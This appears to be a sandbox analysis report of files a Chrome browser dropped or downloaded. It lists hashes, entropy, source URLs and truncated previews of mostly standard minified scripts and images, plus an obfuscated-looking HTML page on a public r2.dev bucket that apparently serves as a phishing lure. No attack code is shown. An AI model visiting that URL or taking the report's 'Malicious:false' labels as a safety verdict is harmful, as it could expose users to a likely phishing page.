                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:763DC672B3BDEEFBA9FB9E25EBFAAA6928AD359E6D188995A3CD40969402C231
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8C4E44D6DA73F3E78DA963DE0EF426725E75EE4AEA599D7C7032EE87D3925CFEE79C5986E0A4F8EDA14DD34FED0550DB727633B1033E4E145DA462B630239629
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://cmp.osano.com/AzZdHGSGtpxCq1Cpt/4e10b135-d113-4574-a477-270ace40bba7/osano.js?language=en
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! For license information please see osano.js.LICENSE.txt */.(()=>{"use strict";var e={558:(e,t,r)=>{t.SS=void 0;var o=r(717),n=function(){var e=[],t=[],r=void 0;return{enhancer:function(e){return r=e,function(e){return function(r){return o.compose.apply(void 0,t)(e)(r)}}},addMiddleware:function(){for(var o,n,a=arguments.length,i=Array(a),c=0;c<a;c++)i[c]=arguments[c];(o=t).push.apply(o,i.map((function(e){return e(r)}))),(n=e).push.apply(n,i)},removeMiddleware:function(r){var o=e.findIndex((function(e){return e===r}));-1!==o?(e=e.filter((function(e,t){return t!==o})),t=t.filter((function(e,t){return t!==o}))):console.error("Middleware does not exist!",r)},resetMiddlewares:function(){t=[],e=[]}}},a=n();a.enhancer,a.addMiddleware,a.removeMiddleware,a.resetMiddlewares,t.SS=n},717:(e,t,r)=>{r.r(t),r.d(t,{__DO_NOT_USE__ActionTypes:()=>l,applyMiddleware:()=>h,bindActionCreators:()=>v,combineReducers:()=>g,compose:()=>m,createStore:()=>d,legacy_createStore:()=>u});var o=r(24);function n(e,t
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (52336)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):358492
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.416267305320949
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:8JVbgSFY0KxwEDA1OYgeaBrWf135TePFc6:MJkDAgYg092
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4285228A39327D6DBB0FD0F66DCE15A0
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1961E95AFC4325B27695EC8A9D78CFC187B1AB9B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3606C679D28F0B91FF876C8648271304AE6D140B645F4E89FFF5B7678B62D01D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BB0936C9B3E9C20F13630BCCC6EF5DF4FEB62E2B654B2BE90DD0BEDD796C5CB6FDD54904C320A81B94124BE38E9D00B2CD6170A1D4578AA340C6800FBECFD2D3
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(){"use strict";function t(){t=function(){return e};var e={},r=Object.prototype,n=r.hasOwnProperty,o="function"==typeof Symbol?Symbol:{},i=o.iterator||"@@iterator",a=o.asyncIterator||"@@asyncIterator",c=o.toStringTag||"@@toStringTag";function u(t,e,r){return Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{u({},"")}catch(t){u=function(t,e,r){return t[e]=r}}function l(t,e,r,n){var o=e&&e.prototype instanceof p?e:p,i=Object.create(o.prototype),a=new I(n||[]);return i._invoke=function(t,e,r){var n="suspendedStart";return function(o,i){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===o)throw i;return T()}for(r.method=o,r.arg=i;;){var a=r.delegate;if(a){var c=g(a,r);if(c){if(c===s)continue;return c}}if("next"===r.method)r.sent=r._sent=r.arg;else if("throw"===r.method){if("suspendedStart"===n)throw n="completed",r.arg;r.dispatchException(r.arg)}else"return"===r.method&&r.abrupt("return",r.arg);
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):88793
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.413865382969959
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:2sHx8vawlWXGzbS1iSc6q1jboAmKum7EqIZ7d+/:2sHx8vzWX8O1iSg1jboAmKum7EqCp+/
                                                                                                                                                                                                                                                                                                                                                                                        MD5:FD35981A337052CD3CCD82DC674FF76D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E11E8DF31D4748D5348ECEC37C01C4DA1549F321
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BD6E71E0A8F18B3DD4BBEB6FD673015FEC896BD92E17C11F3DC8FE96A06DE1F4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9D7A20899C255FC008683F2DCAFDA6332B19B56CA88850661F25245DC4844059404D7D2FEE7C4249775ABA92A61F4870393FCCBAE8A74B12463CF903F05143E3
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://m.stripe.network/out-4.5.44.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:var StripeM=function(e){var t={};function n(r){if(t[r])return t[r].exports;var _=t[r]={i:r,l:!1,exports:{}};return e[r].call(_.exports,_,_.exports,n),_.l=!0,_.exports}return n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var _ in e)n.d(r,_,function(t){return e[t]}.bind(null,_));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=30)}([function(e,t,n){"use strict";(function(e){n.d(t,"a",(function(){retur
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (19863), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):19863
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3447766218190145
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:s40C/Kax6IcZb9QI0rcOZ4yjR8rSxnMhNgyyi82Xo4uc:Vr6IcZqInOnRHMrPyG1
                                                                                                                                                                                                                                                                                                                                                                                        MD5:BC033C3A83E1880E480086BF11AC0B0A
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:35137329601CC7E9CECFFEA9B881C363D42799F5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AEBE8DF81EE2BA5BC51E3ABC322910EE5122A0AC06EDFBCF7A04E1659D17DC9C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:45CB92F652D6D14F65FE7CDA19389A6C5BE8BADD7EF0110EAD45D045EC20A6037D0C21C594FD193387C49E5150E8B8FC559CF6476AAFBF2B33324993667516CE
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(e){var t={};function n(r){if(t[r])return t[r].exports;var i=t[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var i in e)n.d(r,i,function(t){return e[t]}.bind(null,i));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=0)}([function(e,t,n){"use strict";function r(){if("undefined"==typeof TextEncoder){window.Tex
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):149829
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.600609063029094
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:Cnxj42ndhXdOU0tNo455wjdrm/bK+OTRMWMrvBDJTcitj+wf2EAeiPWMWNZVgdyo:Cnxj4y9OU03o4PwjhIBVT39ROyuvb
                                                                                                                                                                                                                                                                                                                                                                                        MD5:DAF17286036BD518A93431BAE557255C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8391CECF7FF61062E9DBFD88CC825FEECEAE9D73
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:2ADCF9FD70C1C834F4B13D732B66F4900CEC9A6BBDC587B85DBC68CDD9A34BE4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0DB754DA88122CBCE3558CBF5A61062C3AEBAF03F8A8F7D23E96B384993C179668D8930FBE38553D3AC190AABA3063442F7A0469F3A18DB77DF8713F853BA97C
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(){"use strict";function t(){t=function(){return e};var e={},d=Object.prototype,n=d.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},o=r.iterator||"@@iterator",i=r.asyncIterator||"@@asyncIterator",a=r.toStringTag||"@@toStringTag";function $(t,e,d){return Object.defineProperty(t,e,{value:d,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{$({},"")}catch(t){$=function(t,e,d){return t[e]=d}}function u(t,e,d,n){var r=e&&e.prototype instanceof s?e:s,o=Object.create(r.prototype),i=new w(n||[]);return o._invoke=function(t,e,d){var n="suspendedStart";return function(r,o){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===r)throw o;return E()}for(d.method=r,d.arg=o;;){var i=d.delegate;if(i){var a=_(i,d);if(a){if(a===c)continue;return a}}if("next"===d.method)d.sent=d._sent=d.arg;else if("throw"===d.method){if("suspendedStart"===n)throw n="completed",d.arg;d.dispatchException(d.arg)}else"return"===d.method&&d.abrupt("return",d.arg);
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 149 x 198, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):20840
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.987308165532062
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:BEs8G/4/B9tjfnEeKK8Qf51Y9+J9um1Xh2WCCl2WR0BnfEQeT+G566g:BV3QBHEUf5mSrxjCCLqt81Ix
                                                                                                                                                                                                                                                                                                                                                                                        MD5:12561144120ACB025D517DF827EC51E0
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:788893B73BCF0FF82EEE66F59E9575D75E96CE7B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F83383E2323967EC49AE0740E63512196FA8BEC3B331D1966FF79A5A4B669B20
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E04FBB6CA9FE38BAF3369A88B31E4769A51EE0757B66E323862DE1DF29624C7128A93BD0907C87672928E72DF0CC85E8E53FFA62A0C121A85FA981C3ACE76DF9
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............f2$....gAMA......a.....sRGB.........PLTE......................,(....................................*)(1/0!..$$%......#"!...766...B><......[G.kV)$#..JIH....rK=0+'...#....|zz{L<:+&.kT.,(...w]ebaE0*lB6.ZHMLL..irqp!......x.{e.bL421..XXX..m.s[BAB...aL.~olm..m...830<97.r[..gphc-,-<;<IDB..nVRQ+...bP....vL@9.............^ZYwvx..}....gQ3".y .VOJ...^<2a...wc...... +PKG.xb.......|...USUztn.jV.....p...^]`R6-..o......ONR....u~SC..d]Y..)..feg...A<.uuC5.O>...fA6....}hN..L5-6....{.....HEH}....y.r].UC..h_A7\5,.*2R......UC&'/....&7n.......A .........v....aUL...:X.Z..{e.........93.P|......./F}^M....n.....\U*9k..gho.! .hT.NGz&%..m.~..w...zt.tdA95.g....."!.50......$"BCK......-(...uTF......U..FjL$"..y......',@.b..:5.WO.icoaT.\P.|f......JTqSz..rg0M.dI>.2/...,A.D`..:5......t...WO..6x.. .IDATx..U]h.....F.....z~<~..0n.1(`..i..a.4.T.*l......b-...y.4....M...vH..yP^..`A..DY.a.p.J($k".'Yc..(..R....R..3.j.9.=..{../..gV?.....E7..m.g..e..F..
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (1595), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):7220
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.705765280697493
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:0pSS6ywyEKM1w4H2PebrC95AzOLmf3sKPu3sg+e22AUuS7F2Pv4T5m:0gSWDR22t6Cf3sKP+5+e22AtPv49m
                                                                                                                                                                                                                                                                                                                                                                                        MD5:CCF576115BE2225A644947486D42E9B8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D2A32BFF945F0D16B5EE6FD20ED35F2FE9C242BB
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EE447F92919327060326719BCAE518DD8132015803C96EC33C322D2FEBA4A27C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:DC748B4A81BE941F5AF8E374FB64EEE102EBC47124C3D8DD4FF787864125C76E4E615177B73F565790B55B4AF4F1394ED4200D1D87BA8A84E93CAC42FD164171
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.html
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<html>....<head>.... <meta ..name="viewport" .content="width=device-width, . initial-scale=1.0">...... ..<a>Nisi nostrud porchetta fugiat culpa landjaeger.</a>.. -->... <script.src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js"></script>..<style>..... .body..,.html.{ height: 100%;margin:..0;display:.flex;align-items:. center;justify-content: center }..@keyframes .bounce { ..0%...,.. 100%..,. 12.5% ,...32.5% .,. 76.1%.{. .transform:.translateY(0) } 22.5%. , ..86% { transform: translateY(7px) . } . }.. #counterwall { .height: .179px;width:.130px;overflow:.. hidden;margin-top:.-59px;margin-left:..25px..}.@keyframes. .shadow-fade..{ 0%. .,..100% , 21.2%.,. 80% ..{ . opacity: . 0 .}. .47% ,. 70%. .{ opacity:. 1 .}...}..... .#orthochromatic ..{.width:.130px;margin-top: .179px }.#yasmin.{ width:..130px;height: 71px;border-radius: . 0 0. 7px.. 7px;overflow:.. hidden;margin-top: -41px.}.. #yasmin > . .reastray. .{. width: 287px;height:.7
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):88793
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.413865382969959
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:2sHx8vawlWXGzbS1iSc6q1jboAmKum7EqIZ7d+/:2sHx8vzWX8O1iSg1jboAmKum7EqCp+/
                                                                                                                                                                                                                                                                                                                                                                                        MD5:FD35981A337052CD3CCD82DC674FF76D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E11E8DF31D4748D5348ECEC37C01C4DA1549F321
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BD6E71E0A8F18B3DD4BBEB6FD673015FEC896BD92E17C11F3DC8FE96A06DE1F4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9D7A20899C255FC008683F2DCAFDA6332B19B56CA88850661F25245DC4844059404D7D2FEE7C4249775ABA92A61F4870393FCCBAE8A74B12463CF903F05143E3
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:var StripeM=function(e){var t={};function n(r){if(t[r])return t[r].exports;var _=t[r]={i:r,l:!1,exports:{}};return e[r].call(_.exports,_,_.exports,n),_.l=!0,_.exports}return n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var _ in e)n.d(r,_,function(t){return e[t]}.bind(null,_));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=30)}([function(e,t,n){"use strict";(function(e){n.d(t,"a",(function(){retur
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3289)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3368
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2155207193383095
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:iIk+VE/UMOj3qtELygTNMCz/UdSchr9wL8klUMOj3+mHmyak9VnOz:Ibuj3qtD2rzncBaL8uuj3H9W
                                                                                                                                                                                                                                                                                                                                                                                        MD5:235C4B4E2DE0058491A1FEA6B0D5E902
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:417D243B0437A2510C88964B1D2555E347E3F08C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E493B51456C0BFB60B76598903D823ED0B902589AF748B2A37F17979E37E8A35
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6C91B4B142D37863A9797B383EAD93BD7FB14072D3A88C96A48BFBCD71B5C27287769B1607377BEF86C583F3156B7C5F62A31612B9D9D17F4F1D641EBE676FE2
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/219.4025f4.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[219],{52219:(e,t,a)=>{a.r(t),a.d(t,{default:()=>_});var r=a(38544),n=a(62832),s=a.n(n),o=a(40880),i=a(96540),l=a(38979),d=a(11865),u=a(51336);function p(e,t,a){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var a=e[Symbol.toPrimitive];if(void 0!==a){var r=a.call(e,t||"default");if("object"!=typeof r)return r;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:t+""}(t))in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}class m extends u.A{constructor(e){super(e),p(this,"handleClick",(e=>{e.preventDefault(),this.setState({loading:!0},(()=>this.props.unpause_and_download(this.props)))})),this.state={loading:!1},this.addWrapperClassNames("auto__doc_page_shared_modals_paused_user")}getModalContent(){return i.createElement(i.Fragme
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (18066)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):448065
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.6275276521028434
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:X4e3ZcduK3zYqiEz+hbxpYRGPVNT4yzhWLml9RM:oeJo3Uqjg0yJY
                                                                                                                                                                                                                                                                                                                                                                                        MD5:86E404D109E1153B3970E89001B9DF0D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0C235B320D11E82369F1EE98E12AEB429644E0CC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A53C8260386F79D84E95D5B3F575A7A303FDD4B63438216F2C981973800EC661
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EB79BEACCDF6A0385A7A9B20301766FD5B17B3F39F3AE7A889E0C8EA07BEB7D3D117AA07F9B45593C7FE68949A889200B717A21C73457E25E3BA0ACB52459D02
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":30,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":8},{"function":"__ogt_1p_data_v2","priority":30,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_l
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65530), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):708943
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.380861846719797
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:AmVsW7mcFTvDxjsLdsuWKUBX8D++brVWWMv410YcStH0qL06QEbVvTSL4RXULTLB:Da1Vf0cWcX+
                                                                                                                                                                                                                                                                                                                                                                                        MD5:FAA462B5B8ABAFB19F4C7EDAA7B46AAA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C7900EE6DACE9D7711B3B4EDED3DCD1A8EB22BEC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:486DD6843D0D2D79063894ADF48CB5C0981060F23B65CB50FAD6B7A1CE6FE699
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B0F6C0C5884B080E825A5F7B66543526B4CF726CF78BC58897B108E459C06AED9DEAA4F2A08F63656402958F5C13DC5AD32F86475466D7AAC35A1EB3379442BE
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://js.stripe.com/v3/
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(){function e(t){var n=o[t];if(void 0!==n)return n.exports;var i=o[t]={id:t,loaded:!1,exports:{}};return r[t](i,i.exports,e),i.loaded=!0,i.exports}var t,n,r={723:function(e,t,n){"use strict";function r(e){l.length||(a(),!0),l[l.length]=e}function o(){for(;d<l.length;){var e=d;if(d+=1,l[e].call(),d>1024){for(var t=0,n=l.length-d;t<n;t++)l[t]=l[t+d];l.length-=d,d=0}}l.length=0,d=0,!1}function i(e){return function(){function t(){clearTimeout(n),clearInterval(r),e()}var n=setTimeout(t,0),r=setInterval(t,50)}}e.exports=r;var a,c,s,u,l=[],d=0,p=void 0!==n.g?n.g:self,m=p.MutationObserver||p.WebKitMutationObserver;"function"==typeof m?(c=1,s=new m(o),u=document.createTextNode(""),s.observe(u,{characterData:!0}),a=function(){c=-c,u.data=c}):a=i(o),r.requestFlush=a,r.makeRequestCallFromTimer=i},5937:function(e,t,n){e.exports=n.p+"fingerprinted/img/abnamro-4445e65420800f96f68cfc67a273f66b.svg"},1520:function(e,t,n){e.exports=n.p+"fingerprinted/img/asn-3d9b1bbff2f8f12105510992dbb37ae8.svg
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 149 x 198, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):8149
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.962449608759007
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:W8iWN6njREj1LYyPp4r6ZMCqUFOdJa/HcfoQjy8gZb513YQ:WlBdE5/pHqUFOdJcCzyThgQ
                                                                                                                                                                                                                                                                                                                                                                                        MD5:807F90340A11622DB987AA5D90386CAD
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6338BACD0A70145174DDE6A6DFED0A3EF944F925
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B982877ACDF52419BB0E15C7EF56884361DF71BB5A0D56AE81ACE55CCCFDB536
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:406E2A9ACC261D6CDEDE1564650880DE1874854E4784B9A265218CD09DB611B07AAE678F27C00F2A64140A6E899E0949A6F9129928BAB7A1B7F3905FA349AB53
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............f2$....gAMA......a.....sRGB.........PLTE.................................................................................................................................................................................................................................................................eee........................///...PPP...&..@............'6..*...4............#9......xxx.........%9..$.(((..............s. ...V......%9:::...... ...]i,....0ZZZ.....%@....._...^i."-HHH...........ky.......%0kkk.Oa.......r (..............).hs.|..x..,6................rrr.P`....)....gx.....ox............u.. 3.bt.........\o.%%%.`t........:P.fk.....;***.0A.......&<L..j. i!%....,8.......>>>.Tf....bv.t.nnn................BT..@9;.IS.Oe...........S)%...ilBBB.....DDD...w..1...sIDATx..X.l.W...?cSN...9.=.\...U.;...+.6...m...M...R[.Z.Y.=!..).H.9@.H4.tX..J....I..#*.H29..R..obS.....( !X.P..........wB.6l.a...6l.a...6l.a.
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
